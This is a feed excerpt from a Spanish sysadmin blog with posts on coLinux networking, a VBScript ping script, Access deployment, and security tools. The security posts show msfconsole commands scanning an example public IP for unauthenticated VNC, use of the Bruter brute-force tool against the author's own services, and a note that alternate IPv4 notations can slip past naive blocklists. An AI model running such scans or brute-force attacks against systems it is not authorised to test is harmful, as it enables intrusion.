<p>Tras instalarlo, probé la configuración de la tarjeta de red con modo<strong> slirp</strong>, o <strong>pcap-bridge</strong>, pero no se veía  la máquina anfitrión con la huésped. Así que probé con el modo<strong> ndis-bridge</strong>.(este modo es operativo a partir de la versión 0.7.4).</p>
<blockquote><p><em><span style="color: #888888;">The NDIS driver is new in coLinux 0.7.4. It makes use of the NDIS  programming API built into windows. It works in practice exactly like  the WinPcap driver, just without third party network drivers.</span></em></p></blockquote>
<p>Ver:</p>
<ul>
<li><a href="http://colinux.wikia.com/wiki/Network#Bridging" target="_blank">http://colinux.wikia.com/wiki/Network#Bridging</a></li>
<li><a href="http://colinux.wikia.com/wiki/Network#NDIS" target="_blank">http://colinux.wikia.com/wiki/Network#NDIS</a></li>
</ul>
<p>En el fichero de configuración (.conf,  en mi caso usé el por defecto <strong>example.conf</strong>), para la tarjeta <strong>eth0</strong> (del huesped linux), le indique se pusiera en modo <strong>bridge</strong> con la tarjeta de red de windows (anfitrión):</p>
<p><strong>eth0=ndis-bridge,&#8221;Conexión de área local&#8221;<br />
</strong></p>
<p>Tras esto, lanzo colinux:</p>
<p><strong>colinux-daemon @example.conf</strong></p>
<p>Y compruebo que efectivamente, en mi XP SP3 con colinux  0.7.7.1, se ve el host anfitrión y el huésped (responde a ping y son alcanzables ambos por otros servicios y protocolos).</p>
<p>Nota para los olvidadizos (como yo): Hay que configurar también las interfaces de red del host huésped <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/colinux-interfaces1.jpg"><img class="size-full wp-image-5964  aligncenter" title="colinux-interfaces" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/colinux-interfaces1.jpg" alt="" width="579" height="597" /></a></p>
<p>Parece todo trivial, pero me pasé un par de buenas horas hasta dar con el modo o driver ndis &#8230; en fin <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<hr />Notas:</p>
<p>- Lo bueno de Colinux:</p>
<p>* Consume pocos recursos en comparación a otros Sw de virtualización (virtualBox, VMWare, &#8230;)</p>
<p>* Puedes trabajar con particiones de tu pc que ya tengan un linux instalado, o incluso con el fichero que emula la partición de Ubuntu de Wubi.</p>
<p>- Lo malo:</p>
<p>* Trabaja con ext3. Pero No trabaja con particiones ext4 <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_sad.gif' alt=':-(' class='wp-smiley' />   . Esperemos que una nueva versión actualice esta limitación.</p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/18/virtualizacion-networking-colinux-y-ndis-driver/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Scripting &#8211; vbs: Como hacer un Ping en vbs</title>
		<link>http://www.javcasta.com/2010/08/08/scripting-vbs-como-hacer-un-ping-en-vbs/</link>
		<comments>http://www.javcasta.com/2010/08/08/scripting-vbs-como-hacer-un-ping-en-vbs/#comments</comments>
		<pubDate>Sun, 08 Aug 2010 19:04:59 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5932</guid>
		<description><![CDATA[Vía: http://gallery.technet.microsoft.com/ScriptCenter/en-us/61fe08c0-270c-45a7-90ed-38c2c4e1b530 Ping.vbs Host=&#34;127.0.0.1&#34; Set objPing = GetObject(&#34;winmgmts:{impersonationLevel=impersonate}&#34;)._ ExecQuery(&#34;Select * from Win32_PingStatus Where Address = '&#34; &#38; Host &#38; &#34;'&#34;) For Each objStatus in objPing strResult = &#34;&#34; &#38; &#34;Result: &#34; Select Case objStatus.StatusCode Case 0 strResult = strResult &#38; &#34;Success&#34; Case 11001 strResult = strResult &#38; &#34;Buffer too small&#34; Case 11002 strResult = strResult [...]]]></description>
			<content:encoded><![CDATA[<p>Vía: <a href="http://gallery.technet.microsoft.com/ScriptCenter/en-us/61fe08c0-270c-45a7-90ed-38c2c4e1b530" target="_blank">http://gallery.technet.microsoft.com/ScriptCenter/en-us/61fe08c0-270c-45a7-90ed-38c2c4e1b530</a></p>
<p>Ping.vbs</p>
<pre class="brush: vb;">
Host=&quot;127.0.0.1&quot;
Set objPing = GetObject(&quot;winmgmts:{impersonationLevel=impersonate}&quot;)._
    ExecQuery(&quot;Select * from Win32_PingStatus Where Address = '&quot; &amp; Host &amp; &quot;'&quot;)

   For Each objStatus in objPing
      strResult = &quot;&quot; &amp; &quot;Result: &quot;
      Select Case objStatus.StatusCode
         Case 0 strResult = strResult &amp; &quot;Success&quot;
         Case 11001 strResult = strResult &amp; &quot;Buffer too small&quot;
         Case 11002 strResult = strResult &amp; &quot;Destination net unreachable&quot;
         Case 11003 strResult = strResult &amp; &quot;Destination host unreachable&quot;
         Case 11004 strResult = strResult &amp; &quot;Destination protocol unreachable&quot;
         Case 11005 strResult = strResult &amp; &quot;Destination port unreachable&quot;
         Case 11006 strResult = strResult &amp; &quot;No resources&quot;
         Case 11007 strResult = strResult &amp; &quot;Bad option&quot;
         Case 11008 strResult = strResult &amp; &quot;Hardware error&quot;
         Case 11009 strResult = strResult &amp; &quot;Packet too big&quot;
         Case 11010 strResult = strResult &amp; &quot;Request timed out&quot;
         Case 11011 strResult = strResult &amp; &quot;Bad request&quot;
         Case 11012 strResult = strResult &amp; &quot;Bad route&quot;
         Case 11013 strResult = strResult &amp; &quot;Time-To-Live (TTL) expired transit&quot;
         Case 11014 strResult = strResult &amp; &quot;Time-To-Live (TTL) expired reassembly&quot;
         Case 11015 strResult = strResult &amp; &quot;Parameter problem&quot;
         Case 11016 strResult = strResult &amp; &quot;Source quench&quot;
         Case 11017 strResult = strResult &amp; &quot;Option too big&quot;
         Case 11018 strResult = strResult &amp; &quot;Bad destination&quot;
         Case 11032 strResult = strResult &amp; &quot;Negotiating IPSEC&quot;
         Case 11050 strResult = strResult &amp; &quot;General failure&quot;
         Case Else strResult = strResult &amp; &quot;Unknown host&quot;
      End Select
      strResult = strResult &amp; &quot; Host : &quot; &amp; UCase(Host)
   Next
   msgbox strResult
   Set objPing = Nothing
</pre>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/08/scripting-vbs-como-hacer-un-ping-en-vbs/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Seguridad: Metasploit framework 3.4.1</title>
		<link>http://www.javcasta.com/2010/08/02/seguridad-metasploit-framework-3-4-1/</link>
		<comments>http://www.javcasta.com/2010/08/02/seguridad-metasploit-framework-3-4-1/#comments</comments>
		<pubDate>Mon, 02 Aug 2010 11:37:30 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5901</guid>
		<description><![CDATA[Vía: http://www.metasploit.com/ Metasploit es un framework (marco o entorno de trabajo) para test de penetración ( Metasploit penetration testing framework ). Hay versiones para Linux y windows. Lo instalo en windows XP SP3: En el transcurso de la instalación, puedes instalar la última versión de Nmap (no necesita presentaciones este scanner de red) y winpcap [...]]]></description>
			<content:encoded><![CDATA[<p>Vía: <a href="http://www.metasploit.com/" target="_blank">http://www.metasploit.com/</a></p>
<p>Metasploit es un framework (marco o entorno de trabajo) para test de penetración ( Metasploit penetration testing framework ). Hay versiones para Linux y windows.</p>
<p>Lo instalo en windows XP SP3:</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-1.jpg"><img class="size-full wp-image-5902  aligncenter" title="MetaSploit-fw341-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-1.jpg" alt="" width="470" height="454" /></a></p>
<p style="text-align: left;">En el transcurso de la instalación, puedes instalar la última versión de Nmap (no necesita presentaciones este scanner de red) y winpcap (la libreria de captura en modo promiscuo de paquetes de red para windows).</p>
<p style="text-align: left;">Lanzamos la consola de Metasploit, la primera vez que se lanza, hay que tener paciencia, ya que se dedica a configurar permisos y entorno &#8230;</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-2.jpg"><img class="size-full wp-image-5903  aligncenter" title="MetaSploit-fw341-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-2.jpg" alt="" width="438" height="157" /></a></p>
<p style="text-align: left;">Y por fin tenemos la consola o shell</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-3.jpg"><img class="size-full wp-image-5904  aligncenter" title="MetaSploit-fw341-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-3.jpg" alt="" width="581" height="342" /></a></p>
<p style="text-align: left;">Probamos un exploit: (Guia en <a href="http://www.metasploit.com/documents/users_guide.pdf" target="_blank">http://www.metasploit.com/documents/users_guide.pdf</a> )</p>
<p style="text-align: left;">- 1º buscamos lo relacionado con un servicio o protocolo de red expotable, p.e: el VNC:</p>
<p style="text-align: left;"><span style="color: #888888;">msf &gt; search vnc</span></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-4.jpg"><img class="size-full wp-image-5905  aligncenter" title="MetaSploit-fw341-4" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-4.jpg" alt="" width="593" height="488" /></a></p>
<p style="text-align: left;">Usamos el modulo auxiliar scanner/vnc/vnc_none_auth</p>
<p style="text-align: left;"><span style="color: #808080;">msf &gt; use scanner/vnc/vnc</span></p>
<p style="text-align: left;">Que nos muestre las opciones (parámetros)</p>
<p style="text-align: left;"><span style="color: #808080;">msf &gt; show options</span></p>
<p style="text-align: left;">Parametrizamos, en este caso solo RHOSTS (Remote Hosts) con la IP del objetivo (pongo una ip de ejemplo)</p>
<p style="text-align: left;"><span style="color: #808080;">msf &gt; set RMHOSTS 80.59.69.239</span></p>
<p style="text-align: left;">Y lanzamos el exploit, en este caso el modulo auxiliar de detección de VNC server sin autenticación</p>
<p style="text-align: left;"><span style="color: #888888;">msf &gt; exploit</span></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-5.jpg"><img class="size-full wp-image-5906  aligncenter" title="MetaSploit-fw341-5" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/MetaSploit-fw341-5.jpg" alt="" width="600" height="249" /></a></p>
<p style="text-align: left;">Y voilá &#8230;</p>
<p style="text-align: left;">Una referencia recomendable: <a href="http://www.offensive-security.com/metasploit-unleashed/VCN-Authentication" target="_blank">http://www.offensive-security.com/metasploit-unleashed/VCN-Authentication</a></p>
<p style="text-align: left;">
<p style="text-align: left;">
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/02/seguridad-metasploit-framework-3-4-1/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Seguridad: Test de fuerza bruta bajo windows con Bruter</title>
		<link>http://www.javcasta.com/2010/08/02/seguridad-test-de-fuerza-bruta-bajo-windows-con-bruter/</link>
		<comments>http://www.javcasta.com/2010/08/02/seguridad-test-de-fuerza-bruta-bajo-windows-con-bruter/#comments</comments>
		<pubDate>Mon, 02 Aug 2010 10:45:49 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5896</guid>
		<description><![CDATA[Referencia: http://www.antrax-labs.net/2010/06/bruter-10-fuerza-bruta-por-varios.html Bruter (Bruter_1.1_Beta1) es una utilidad bajo windows (o en linux si lo usas con wine), para ejecutar test de fuerza bruta contra diversos protocolos: (telnet, ssh2, ftp, http, SQL Server, SMB, MySQL, VNC, &#8230;) Lo pruebo contra una bbdd, mia, en remoto bajo MS SQL Server 2008 : Y funciona bien (logicamente sé [...]]]></description>
			<content:encoded><![CDATA[<p>Referencia: <a href="http://www.antrax-labs.net/2010/06/bruter-10-fuerza-bruta-por-varios.html" target="_blank">http://www.antrax-labs.net/2010/06/bruter-10-fuerza-bruta-por-varios.html</a></p>
<p>Bruter (Bruter_1.1_Beta1) es una utilidad bajo windows (o en linux si lo usas con wine), para ejecutar test de fuerza bruta contra diversos protocolos: (telnet, ssh2, ftp, http, SQL Server, SMB, MySQL, VNC, &#8230;)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-1.jpg"><img class="size-full wp-image-5897  aligncenter" title="Bruter-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-1.jpg" alt="" width="638" height="546" /></a></p>
<p style="text-align: left;">Lo pruebo contra una bbdd, <strong>mia</strong>, en remoto bajo MS SQL Server 2008 :</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-2.jpg"><img class="size-full wp-image-5898  aligncenter" title="Bruter-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-2.jpg" alt="" width="639" height="546" /></a></p>
<p style="text-align: left;">Y funciona bien (logicamente sé mi usuario:contraseña, pero compruebo que funciona como test de fuerza bruta). Ahora efectuo un test contra mi máquina local al servidor ssh:</p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-3.jpg"><img class="size-full wp-image-5899    aligncenter" title="Bruter-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/Bruter-3.jpg" alt="" width="639" height="546" /></a></p>
<p style="text-align: left;">Y, efectivamente, trabaja bien.</p>
<p style="text-align: left;">nota: Marco &#8220;Stop when found one&#8221; (Parar cuando encuentre una [ contraseña ] ), para no hacer interminable el test.</p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/02/seguridad-test-de-fuerza-bruta-bajo-windows-con-bruter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Distribuir aplicaciones de escritorio basadas en Access, sin tener acces instalado en cliente</title>
		<link>http://www.javcasta.com/2010/07/29/distribuir-aplicaciones-de-escritorio-basadas-en-access-sin-tener-acces-instalado-en-cliente/</link>
		<comments>http://www.javcasta.com/2010/07/29/distribuir-aplicaciones-de-escritorio-basadas-en-access-sin-tener-acces-instalado-en-cliente/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 10:40:07 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5834</guid>
		<description><![CDATA[Distribuir aplicaciones de escritorio basadas en Access, sin tener acces instalado en cliente o Desktop Access-StandAlone Application: referencias: - Runtime Access 2007 - Download the Access 2007 Developer Extensions Es bastante util y rápido (productivo) implementar aplicaciones de escritorio en windows con Access. Personalmente uso access en windows,  para implementar los formularios de usuario (el [...]]]></description>
			<content:encoded><![CDATA[<h3><span style="text-decoration: underline;">Distribuir aplicaciones de escritorio basadas en Access, sin tener acces instalado en cliente</span></h3>
<p><strong>o</strong> <strong>Desktop Access-StandAlone Application:</strong></p>
<p><strong>referencias: </strong></p>
<p><strong>- <a href="http://www.microsoft.com/downloads/details.aspx?displaylang=es&amp;FamilyID=d9ae78d9-9dc6-4b38-9fa6-2c745a175aed" target="_blank">Runtime Access 2007</a></strong></p>
<p><strong>- </strong><a id="ctl00_mainContentContainer_ctl14" onclick="javascript:Track('ctl00_mainContentContainer_ctl00|ctl00_mainContentContainer_ctl14',this);" href="http://www.microsoft.com/downloads/details.aspx?FamilyID=d96a8358-ece4-4bee-a844-f81856dceb67" target="_blank"><strong>Download the Access 2007 Developer Extensions</strong></a></p>
<p>Es bastante util y rápido (productivo) implementar aplicaciones de escritorio en windows con Access.</p>
<p>Personalmente uso access en windows,  para implementar los formularios de usuario (el gui o frontend), y que ataquen (consulten, inserten, actualicen, borren, &#8230; registros en una bbdd) a una bbdd en red (SQL Server, MySQL o el propio Access si es una bbdd pequeña y para pocos usuarios y con necesidades de seguridad mínimas).</p>
<p>Lo que ocurre es que si cada usuario debe de tener una licencia de access, sale costoso.</p>
<p>Pero hay una solución. El desarrollador tendría access instalado y podría distribuir su aplicación a los usuarios, sin que tengan acces instalado gracias al <em><strong>Runtime distribuible de Access</strong></em> y al Microsoft Office <em><strong>Access Developer extensions</strong></em>. Y a parte de rápido y barato, tienes la seguridad de que ningún manitas manipulará el código de la aplicación/bbdd &#8230;</p>
<p>* Procedimiento:</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-1.jpg"><img class="size-full wp-image-5835  aligncenter" title="Access-2007-developer-extensions-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-1.jpg" alt="" width="609" height="596" /></a></p>
<p style="text-align: left;">- Una vez diseñada y abierta la aplicación/bbdd en Access, y habiendo  instalado previamente el Access Developer extensions, desde el menú  principal &gt; Programador &gt; Paquete de soluciones</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-2.jpg"><img class="size-full wp-image-5836  aligncenter" title="Access-2007-developer-extensions-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-2.jpg" alt="" width="512" height="469" /></a></p>
<p style="text-align: left;">- 2º Seguimos el asistente para paquetes de soluciones</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-3.jpg"><img class="size-full wp-image-5837  aligncenter" title="Access-2007-developer-extensions-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-3.jpg" alt="" width="560" height="420" /></a></p>
<p style="text-align: left;">- Carpeta de destino</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-4.jpg"><img class="size-full wp-image-5838  aligncenter" title="Access-2007-developer-extensions-4" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-4.jpg" alt="" width="640" height="480" /></a></p>
<p style="text-align: left;">- Entre otras opciones (icono, carpetas de instalacion, &#8230;) elijo la opción de descargar Runtime de access, si no tiene el cliente access instalado.</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-5.jpg"><img class="size-full wp-image-5839  aligncenter" title="Access-2007-developer-extensions-5" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-5.jpg" alt="" width="560" height="420" /></a></p>
<p style="text-align: left;">- podriamos añadir ficheros adicionales (imágenes, aplicaciones complemetarias, &#8230;) y claves de registro</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-6.jpg"><img class="size-full wp-image-5840  aligncenter" title="Access-2007-developer-extensions-6" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-6.jpg" alt="" width="640" height="480" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-7.jpg"><img class="size-full wp-image-5841  aligncenter" title="Access-2007-developer-extensions-7" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-7.jpg" alt="" width="640" height="480" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-8.jpg"><img class="size-full wp-image-5842  aligncenter" title="Access-2007-developer-extensions-8" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-8.jpg" alt="" width="540" height="120" /></a></p>
<p style="text-align: left;">- Nombre, título, licencia, información, imagen del instalador &#8230; Una vez finalizado el proceso &#8230;</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-9.jpg"><img class="size-full wp-image-5843  aligncenter" title="Access-2007-developer-extensions-9" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-9.jpg" alt="" width="562" height="271" /></a></p>
<p style="text-align: left;">- Nos crea un setup.exe (el instalador) con los ficheros necesarios para la instalación.</p>
<p style="text-align: left;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-10.jpg"><img class="aligncenter size-full wp-image-5844" title="Access-2007-developer-extensions-10" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-10.jpg" alt="" width="497" height="385" /></a></p>
<p style="text-align: left;">- Ejecuto el instalador (puede estar en un recurso compartido de red)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-11.jpg"><img class="size-full wp-image-5845  aligncenter" title="Access-2007-developer-extensions-11" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-11.jpg" alt="" width="499" height="385" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-12.jpg"><img class="size-full wp-image-5846  aligncenter" title="Access-2007-developer-extensions-12" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-12.jpg" alt="" width="499" height="385" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-13.jpg"><img class="size-full wp-image-5847  aligncenter" title="Access-2007-developer-extensions-13" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-13.jpg" alt="" width="499" height="385" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-14.jpg"><img class="size-full wp-image-5848  aligncenter" title="Access-2007-developer-extensions-14" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-14.jpg" alt="" width="499" height="385" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-15.jpg"><img class="size-full wp-image-5849  aligncenter" title="Access-2007-developer-extensions-15" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-15.jpg" alt="" width="499" height="385" /></a></p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-16.jpg"><img class="aligncenter size-full wp-image-5850" title="Access-2007-developer-extensions-16" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-16.jpg" alt="" width="424" height="81" /></a></p>
<p style="text-align: left;">- La instalación crea un acceso directo en el menú y en el escritorio (configurable). Y una vez el usuario ejecute su instalación, si no dispone del runtime de access, se descargaria y se instalaria (solo una vez haria falta este proceso) y se habriria su <strong>Desktop Access-StandAlone Application</strong> . <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-17.jpg"><img class="size-full wp-image-5851  aligncenter" title="Access-2007-developer-extensions-17" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Access-2007-developer-extensions-17.jpg" alt="" width="639" height="369" /></a></p>
<p style="text-align: center;">Y voilá &#8230;</p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/29/distribuir-aplicaciones-de-escritorio-basadas-en-access-sin-tener-acces-instalado-en-cliente/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tip Networking: IPv4 expresada como Decimal, Octal, Entera, Hexadecimal</title>
		<link>http://www.javcasta.com/2010/07/29/tip-networking-ipv4-expresada-como-decimal-octal-entera-hexadecimal/</link>
		<comments>http://www.javcasta.com/2010/07/29/tip-networking-ipv4-expresada-como-decimal-octal-entera-hexadecimal/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 08:24:04 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5832</guid>
		<description><![CDATA[Refrencia: http://www.silisoftware.com/tools/ipconverter.php Una IPv4,  es una dirección de 32 bits, que sirve para identificar de forma lógica una interfaz de red de un host o dispositivo, expresada en cuatro octetos: a.b.c.d , donde a,b,c,d son enteros comprendidos entre 0 y 255 Uno de los  DNS (URL &#60;&#8212;&#62; IPv4 en decimal) de www.google.es, es: www.google.es &#60;&#8212;&#62;  [...]]]></description>
			<content:encoded><![CDATA[<p>Refrencia: <a href="http://www.silisoftware.com/tools/ipconverter.php" target="_blank">http://www.silisoftware.com/tools/ipconverter.php</a></p>
<p><strong>Una IPv4,  es una dirección de 32 bits</strong>, que sirve para identificar de forma lógica una interfaz de red de un host o dispositivo, expresada en cuatro octetos: <strong>a.b.c.d</strong> , donde a,b,c,d son enteros comprendidos entre 0 y 255</p>
<p>Uno de los  DNS (URL &lt;&#8212;&gt; IPv4 en decimal) de <a href="http://www.google.es" target="_blank"><strong>www.google.es</strong></a>, es:</p>
<p><strong><a href="http://www.google.es/" target="_blank"><strong>www.google.es</strong></a></strong> &lt;&#8212;&gt;  <a href="http://66.249.92.104" target="_blank">66.249.92.104</a></p>
<p>Pero si expresamos esta IP en distintos formatos, ya sea calculandolo a mano o usando un <a href="http://www.silisoftware.com/tools/ipconverter.php" target="_blank">conversor</a>:</p>
<ul>
<li>Octal:  <a href="http://000000102.000000371.000000134.000000150/" target="_blank">000000102.000000371.000000134.000000150</a></li>
</ul>
<ul>
<li>Hexadecimal:  <a href="http://0x42f95c68/" target="_blank">0x42f95c68</a></li>
</ul>
<ul>
<li>Entero:  <a href="http://1123638376/" target="_blank">1123638376</a></li>
</ul>
<ul>
<li>Decimal: <a href="http://66.249.92.104/" target="_blank">66.249.92.104</a></li>
</ul>
<p>Todos los formatos serán interpretados por tu sistema y/o tu navegador como válidos:</p>
<p>Ejemplo, si efectuo un ping a la ip <a href="http://66.249.92.104/" target="_blank">66.249.92.104</a>, en distintos formatos:</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/ping-ip-distintos-formatos.jpg"><img class="size-full wp-image-5833  aligncenter" title="ping-ip-distintos-formatos" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/ping-ip-distintos-formatos.jpg" alt="" width="647" height="413" /></a></p>
<p>Todos funcionan sin problema. Una de las hipotéticas utilidades que a voz de pronto puede tener el usar la IPv4 en otro formato es evadir una lista negra de DNS de un firewall o proxy. Pero, claro, seria un firewall o proxy muy ingenuo &#8230;</p>
<p> <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/29/tip-networking-ipv4-expresada-como-decimal-octal-entera-hexadecimal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scripting &#8211; cmd, bat: Listar usuarios y grupos del dominio y otros menesteres por consola cmd</title>
		<link>http://www.javcasta.com/2010/07/20/scripting-cmd-bat-listar-usuarios-y-grupos-del-dominio-y-otros-menesteres-por-consola-cmd/</link>
